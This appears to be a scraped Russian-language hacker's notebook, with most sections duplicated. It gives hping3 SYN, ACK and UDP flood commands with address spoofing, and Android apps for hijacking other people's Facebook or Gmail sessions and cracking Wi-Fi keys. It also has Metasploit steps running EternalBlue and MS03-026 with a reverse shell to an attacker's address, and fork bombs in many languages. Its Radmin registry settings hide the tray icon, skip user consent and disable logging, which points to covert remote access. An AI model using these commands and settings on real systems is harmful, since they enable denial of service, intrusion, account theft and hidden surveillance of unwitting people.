Поэтому сами выбирайте как лучше производить подключение.

26) Далее устанавливаем websploit

git clone https://github.com/websploit/websploit

и устанавливаем scapy

apt-get install scapy

На этом все.

hping3

ссылки:

https://allwebstuff.info/hping3-%D1%84%D0%BB%D1%83%D0%B4%D0%B8%D0%BC-%D0%BF%D0%BE-%D1%81%D0%B2%D0%BE%D0%B5%D0%BC%D1%83-%D1%81%D0%B0%D0%B9%D1%82%D1%83

https://itsecforu.ru/2018/02/06/hping3-%D1%81%D0%B5%D1%82%D0%B5%D0%B2%D0%BE%D0%B9-%D1%81%D0%BA%D0%B0%D0%BD%D0%B8%D1%80%D1%83%D1%8E%D1%89%D0%B8%D0%B9-%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BC%D0%B5%D0%BD%D1%82-%D0%B3%D0%B5%D0%BD/

https://allwebstuff.info/hping3-%D1%84%D0%BB%D1%83%D0%B4%D0%B8%D0%BC-%D0%BF%D0%BE-%D1%81%D0%B2%D0%BE%D0%B5%D0%BC%D1%83-%D1%81%D0%B0%D0%B9%D1%82%D1%83

https://itsecforu.ru/2018/02/06/hping3-%D1%81%D0%B5%D1%82%D0%B5%D0%B2%D0%BE%D0%B9-%D1%81%D0%BA%D0%B0%D0%BD%D0%B8%D1%80%D1%83%D1%8E%D1%89%D0%B8%D0%B9-%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BC%D0%B5%D0%BD%D1%82-%D0%B3%D0%B5%D0%BD/

hping3

hping — бесплатный генератор пакетов и анализатор для протокола TCP / IP, распространенный Salvatore Sanfilippo (также известный как Antirez).

apt install hping3 - установка

Командный синтаксис:
hping3 - имя бинарного приложения.
-c 100000 - количество отправленных пакетов.
-d 120 - размер каждого пакета, который был отправлен на целевой компьютер.
-S - отправляю только пакеты SYN.
-w 64 - размер окна TCP.
-p 21 - порт назначения (21 — порт FTP). здесь вы можете использовать любой порт.
—flood - отправка пакетов как можно быстрее, без необходимости отображать входящие ответы. режим флуда.
—rand-source - использование случайных источников IP-адресов. вы также можете использовать -a или -spoof, чтобы скрыть имена хостов.
IP-адрес целевого IP-адреса или целевой IP-адрес. 


hping3 -i u1000 -p 80 IP_СЕРВЕРА - отправить пакеты 1000 в cек IP_СЕРВЕРА на порт 80
                                   -i u1000 - это интервал между отправляемыми пакетами, в микросекундах. u1000 - примерно 1000 пакетов в секунду
                                   -p 80 - порт назначения
                                   IP_СЕРВЕРА - последний параметр IP адрес куда доставить пакет


hping3 -i u1000 --udp -p 80 -d 65500 IP_СЕРВЕРА - udp flood  где -d 65500 - размер посылаемого udp пакета

hping3 -i u1000 -A -p 80 IP_СЕРВЕРА - TCP ACK flood где -A - отправлять ACK флаг

hping3 -i u1000 -S -p 80 IP_СЕРВЕРА - TCP SYN flood где -S - отправлять SYN флаг

Так же можно отправлять SYN-ACK, SYN-ACK-FIN флуд, подменять ip адрес, в общем, всё что пожелаете.

hping — бесплатный генератор пакетов и анализатор для протокола TCP / IP, распространенный Salvatore Sanfilippo (также известный как Antirez).

apt install hping3 - установка

Командный синтаксис:

hping3 - имя бинарного приложения.

-c 100000 - количество отправленных пакетов.

-d 120 - размер каждого пакета, который был отправлен на целевой компьютер.

-S - отправляю только пакеты SYN.

-w 64 - размер окна TCP.

-p 21 - порт назначения (21 — порт FTP). здесь вы можете использовать любой порт.

—flood - отправка пакетов как можно быстрее, без необходимости отображать входящие ответы. режим флуда.

—rand-source - использование случайных источников IP-адресов. вы также можете использовать -a или -spoof, чтобы скрыть имена хостов.

IP-адрес целевого IP-адреса или целевой IP-адрес.

hping3 -i u1000 -p 80 IP_СЕРВЕРА - отправить пакеты 1000 в cек IP_СЕРВЕРА на порт 80

-i u1000 - это интервал между отправляемыми пакетами, в микросекундах. u1000 - примерно 1000 пакетов в секунду

-p 80 - порт назначения

IP_СЕРВЕРА - последний параметр IP адрес куда доставить пакет

hping3 -i u1000 --udp -p 80 -d 65500 IP_СЕРВЕРА - udp flood где -d 65500 - размер посылаемого udp пакета

hping3 -i u1000 -A -p 80 IP_СЕРВЕРА - TCP ACK flood где -A - отправлять ACK флаг

hping3 -i u1000 -S -p 80 IP_СЕРВЕРА - TCP SYN flood где -S - отправлять SYN флаг

Так же можно отправлять SYN-ACK, SYN-ACK-FIN флуд, подменять ip адрес, в общем, всё что пожелаете.

телефон — орудие пентеста

https://xakep.ru/2014/09/09/podbiraem-devajsy-dlya-nastoyashhego-pentestera/
В общем-го, если не требуется решать каких-то специфических задач то в полноценный инструмент пентестера можно превратить и обычный телефон на базе Android. 
Благо, соответствующих приложений подданную ОС вполне достаточно.

0. dSploit — набор утилит для проведения пентестинга с помощью смартфона. 
В его состав входят: утилита для сканирования портов, сканер уязвимостей, приложения для подбора логинов/паролей, инструмент для проведения MITM-атак и многое другое. 
Для того чтобы использовать весь этот набор, необходимо предварительно порутать девайс и установить на него BusyBox.

1. Network Spoofer — утилита для спуфинга сайтов в беспроводных сетях.

2. Network Discovery — утилита, позволяющая найти все устройства и сети, подключенные к твоей Wi-Fi-точке

3. Shark for Root — сетевой снифер, отлично работающий с 3G- и Wi-Fi-сетями. 
Полученный дамп затем можно проанализировать в Shark Reader или Wireshark.

4. Penetrate Pro — довольно милое приложение для расшифровки Wi-Fi-трафика, которое умеет рассчитывать WEP/WPA-ключи для некоторых моделей роутеров: 
Discus, Thomson, Infinitum, BBox, Orange, DMax, SpeedTouch, DLink, BigPond, O2Wireless и Eircom 
(оригинальная версия утилиты была выпилена с Goole Play, поэтому, скачав из Сети установочный пакет, обязательно проверь его перед инсталляцией).

5. DroidSheep — инструмент для угона сессий, с помощью которого можно быстро получить доступ к чужим аккаунтам Facebook, Twitter, LinkedIn и Gmail.

6. WPScan — сканер уязвимостей для популярного движка WordPress.

7. FaceNiff — еще один инструмент для перехвата веб-сессий.
8. WebSecurify — крутой сканер веб-уязвимостей, доступный для всех десктопных и мобильных платформ.

И это еще не полный список, так что, как видишь, для проведения первоначальной разведки хватит и обычного смартфона.

https://xakep.ru/2014/09/09/podbiraem-devajsy-dlya-nastoyashhego-pentestera/

В общем-го, если не требуется решать каких-то специфических задач то в полноценный инструмент пентестера можно превратить и обычный телефон на базе Android.

Благо, соответствующих приложений подданную ОС вполне достаточно.

0. dSploit — набор утилит для проведения пентестинга с помощью смартфона.

В его состав входят: утилита для сканирования портов, сканер уязвимостей, приложения для подбора логинов/паролей, инструмент для проведения MITM-атак и многое другое.

Для того чтобы использовать весь этот набор, необходимо предварительно порутать девайс и установить на него BusyBox.

1. Network Spoofer — утилита для спуфинга сайтов в беспроводных сетях.

2. Network Discovery — утилита, позволяющая найти все устройства и сети, подключенные к твоей Wi-Fi-точке

3. Shark for Root — сетевой снифер, отлично работающий с 3G- и Wi-Fi-сетями.

Полученный дамп затем можно проанализировать в Shark Reader или Wireshark.

4. Penetrate Pro — довольно милое приложение для расшифровки Wi-Fi-трафика, которое умеет рассчитывать WEP/WPA-ключи для некоторых моделей роутеров:

Discus, Thomson, Infinitum, BBox, Orange, DMax, SpeedTouch, DLink, BigPond, O2Wireless и Eircom

(оригинальная версия утилиты была выпилена с Goole Play, поэтому, скачав из Сети установочный пакет, обязательно проверь его перед инсталляцией).

5. DroidSheep — инструмент для угона сессий, с помощью которого можно быстро получить доступ к чужим аккаунтам Facebook, Twitter, LinkedIn и Gmail.

6. WPScan — сканер уязвимостей для популярного движка WordPress.

7. FaceNiff — еще один инструмент для перехвата веб-сессий.

8. WebSecurify — крутой сканер веб-уязвимостей, доступный для всех десктопных и мобильных платформ.

И это еще не полный список, так что, как видишь, для проведения первоначальной разведки хватит и обычного смартфона.

kali / metasploit / meterpreter

use kali linux

0) msfconsole - запуск метасплоит
1) use exploit/windows/smb/ms17_10_enternelblue - выбор эксплоита
2) set rhost 127.0.0.01 - выбор ip атакуемого
3) exploit - применить эксплоит

0) msfconsole - запуск метасплоит

1) use exploit/windows/smb/ms17_10_enternelblue - выбор эксплоита

2) set rhost 127.0.0.01 - выбор ip атакуемого

3) exploit - применить эксплоит

примеры команд

https://localhost:3790/ - веб интерфейс

msfconsole - запуск метасплоит
db_status - проверка базы 
git init - проврка запуска метасполоит 

use auxiliary/scanner/portscan/tcp - использовать сканер
set PORTS 1-5000 - задать диапазон портов для сканирования
set RHOSTS 192.168.88.161 - задать ip для сканирования
run - запуск


search dcom - поиск эксплоитов dcom
use exploit/windows/dcerpc/ms03_026_dcom - будем использовать эксплоит
set payload windows/shell_reverse_tcp - в случае удачи заливаем нагрузку shell_reverse_tcp 
show options - смотрим обязательные опции для нагрузки
set RHOSTS 192.168.88.161 - IP той машины, которую будем проверять на защищенность
set LHOST 192.168.88.247  - IP злоумышленника
run - запуск


cd ..\..\ - видовая команда перехода между каталогами ( скорее всего попадем на диск C:\ ) (.. вернутся на каталог выше) ( . текущий каталог)
echo Hello! >  achtung.x - создать текстовый файл achtung.x с содержимым Hello!
msg helo - виндовая команда посылки сообщения
можно вводить любую команду, как в обычном cmd.exe

https://localhost:3790/ - веб интерфейс

msfconsole - запуск метасплоит

db_status - проверка базы

git init - проврка запуска метасполоит

use auxiliary/scanner/portscan/tcp - использовать сканер

set PORTS 1-5000 - задать диапазон портов для сканирования

set RHOSTS 192.168.88.161 - задать ip для сканирования

run - запуск

search dcom - поиск эксплоитов dcom

use exploit/windows/dcerpc/ms03_026_dcom - будем использовать эксплоит

set payload windows/shell_reverse_tcp - в случае удачи заливаем нагрузку shell_reverse_tcp

show options - смотрим обязательные опции для нагрузки

set RHOSTS 192.168.88.161 - IP той машины, которую будем проверять на защищенность

set LHOST 192.168.88.247 - IP злоумышленника

run - запуск

cd ..\..\ - видовая команда перехода между каталогами ( скорее всего попадем на диск C:\ ) (.. вернутся на каталог выше) ( . текущий каталог)

echo Hello! > achtung.x - создать текстовый файл achtung.x с содержимым Hello!

msg helo - виндовая команда посылки сообщения

можно вводить любую команду, как в обычном cmd.exe

Fork bomb

Ссылки:

https://en.wikipedia.org/wiki/Fork_bomb

1	https://en.wikipedia.org/wiki/Fork_bomb

Ruby

fork while true

1	fork while true

Perl

perl -e "fork while fork" &

1	perl -e "fork while fork" &

Python

import os
while True:
    os.fork()

import os

while True:

os.fork()

#include <sys/types.h>
#include <unistd.h>

int main()
{
    while(1)
    {
      fork();
    }
    return 0;
}

#include <sys/types.h>

#include <unistd.h>

int main()

{

while(1)

{

fork();

}

return 0;

}

Java

public class ForkBomb
{
    public static void main(String[] args)
    {
        while (true)
        {
            Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});
        }
    }
}

public class ForkBomb

{

public static void main(String[] args)

{

while (true)

{

Runtime.getRuntime().exec(new String[]{"javaw", "-cp", System.getProperty("java.class.path"), "ForkBomb"});

}

Lua

-- Requires `luaposix' module
local unistd = require "posix.unistd"

while true do
  unistd.fork()
end

-- Requires `luaposix' module

local unistd = require "posix.unistd"

while true do

unistd.fork()

end

Assembly (Linux running on IA-32)

section .text
    global _start
    
_start:
    mov eax,2 ;System call for forking
    int 0x80  ;Call kernel
    jmp _start

section .text

global _start

_start:

mov eax,2 ;System call for forking

int 0x80 ;Call kernel

jmp _start

Shell script

#!/bin/sh
./$0|./$0&

1 2	#!/bin/sh ./$0\|./$0&

Shell script

#!/bin/sh
./$0&
./$0&

#!/bin/sh

./$0&

Bash

bomb(){
  bomb | bomb & 
}
bomb

bomb(){

bomb | bomb &

}

bomb

Bash

:(){ :|:& };:

1	:(){ :\|:& };:

Bash

bomb(){bomb|bomb&};bomb

1	bomb(){bomb\|bomb&};bomb

Windows batch

:ForkBomb
 start
 goto ForkBomb

:ForkBomb

start

goto ForkBomb

Windows batch

%0 | %0

%0 | %0

Windows batch

echo  %0^|%0  >forkbomb.bat & forkbomb.bat

1	echo %0^\|%0 >forkbomb.bat & forkbomb.bat

Windows batch

cmd /k echo -^|->-.bat&-

1	cmd /k echo -^\|->-.bat&-

PowerShell

while ($true) {
    Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:";
    Invoke-Expression -Command 'while($true) {Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:"}';
}

while ($true) {

Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:";

Invoke-Expression -Command 'while($true) {Start-Process powershell.exe -ArgumentList "-NoExit", "Get-ChildItem -Recurse C:"}';

}

JavaScript

(f => f(f))(async f => f(f) && f(f));

1	(f => f(f))(async f => f(f) && f(f));

Radmin настройка / установка / удаление / winrar / blat.exe / ip.exe

Ссылки:

https://www.radmin.ru/download/
http://xaker.name/threads/19398/
https://technet.microsoft.com/library/hh528537.aspx?f=255&MSPPError=-2147217396
https://www.itninja.com/community/appdeploy-repackager

https://www.radmin.ru/download/

http://xaker.name/threads/19398/

https://technet.microsoft.com/library/hh528537.aspx?f=255&MSPPError=-2147217396

https://www.itninja.com/community/appdeploy-repackager

ПО:

пакет утилит Radmin Deployment tool
msi пакет сервера Radmin
программа Bat to Exe Converter
архиватор WinRar
для отправки email blat.exe
сплойт Windows Task Scheduler Privilege Escalation

пакет утилит Radmin Deployment tool

msi пакет сервера Radmin

программа Bat to Exe Converter

архиватор WinRar

для отправки email blat.exe

сплойт Windows Task Scheduler Privilege Escalation

Ветки реестра radmin 2.x

Основные: 
спрашивать пользователя
спрятать иконку
включить/выключить логи
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AskUser] "00 00 00 00"
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon] "00 00 00 00" 
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableLogFile] "00 00 00 00"
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\NTAuthEnabled] "00 00 00 00" 
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisallowChanges] "01 00 00 00"
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableBeep] "01 00 00 00" 


Остальные:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableLogFile]
Включить протоколирование. 
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (включить) и "00 00 00 00" (отключить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\LogFilePath]
Путь до файла протокола. Тип параметра - строковый (string) (полный путь до лог-файла).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter]
Пароль Radmin Server (модифицированный так, что восстановить по нему исходный пароль невозможно).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port]
Номер порта. 
Тип параметра - двоичный (binary) (десятичный номер порта, переведённый в шестнадцатеричный формат).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\NTAuthEnabled]
Включить NT Security. 
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (включить) и "00 00 00 00" (отключить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\NtUsers\]
Список пользователей для NT Security.

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType\Data]
Лицензионный ключ (модифицированный так, что восстановить по нему исходный ключ невозможно).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisallowChanges]
Запретить изменение настроек Radmin Server. 
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) и "00 00 00 00" (разрешить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableBeep]
Отключить звуковой сигнал при подключении. 
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (отключить) and "00 00 00 00" (включить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableRedirect]
Заблокировать подключения в режиме Переадресация (Redirect) к данному Radmin Server.  
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) and "00 00 00 00" (разрешить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableScreen]
Заблокировать подключения в режиме Полный контроль (Full control) к данному Radmin Server.  
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) and "00 00 00 00" (разрешить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableView]
Заблокировать подключения в режиме Только просмотр (View Only) к данному Radmin Server.  
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) and "00 00 00 00" (разрешить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTelnet]
Заблокировать подключения в режиме Телнет (Telnet) к данному Radmin Server.  
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) and "00 00 00 00" (разрешить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableFile]
Заблокировать подключения в режиме Обмен файлами (File Transfer) к данному Radmin Server.  
Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) and "00 00 00 00" (разрешить).

Основные:

спрашивать пользователя

спрятать иконку

включить/выключить логи

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\AskUser] "00 00 00 00"

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableTrayIcon] "00 00 00 00"

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableLogFile] "00 00 00 00"

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\NTAuthEnabled] "00 00 00 00"

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisallowChanges] "01 00 00 00"

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableBeep] "01 00 00 00"

Остальные:

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\EnableLogFile]

Включить протоколирование.

Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (включить) и "00 00 00 00" (отключить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\LogFilePath]

Путь до файла протокола. Тип параметра - строковый (string) (полный путь до лог-файла).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter]

Пароль Radmin Server (модифицированный так, что восстановить по нему исходный пароль невозможно).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port]

Номер порта.

Тип параметра - двоичный (binary) (десятичный номер порта, переведённый в шестнадцатеричный формат).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\NTAuthEnabled]

Включить NT Security.

Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (включить) и "00 00 00 00" (отключить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\NtUsers\]

Список пользователей для NT Security.

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType\Data]

Лицензионный ключ (модифицированный так, что восстановить по нему исходный ключ невозможно).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisallowChanges]

Запретить изменение настроек Radmin Server.

Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (запретить) и "00 00 00 00" (разрешить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableBeep]

Отключить звуковой сигнал при подключении.

Тип параметра - двоичный (binary), возможные значения: "01 00 00 00" (отключить) and "00 00 00 00" (включить).

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\DisableRedirect]

Заблокировать подключения в режиме Переадресация (Redirect) к данному Radmin Server.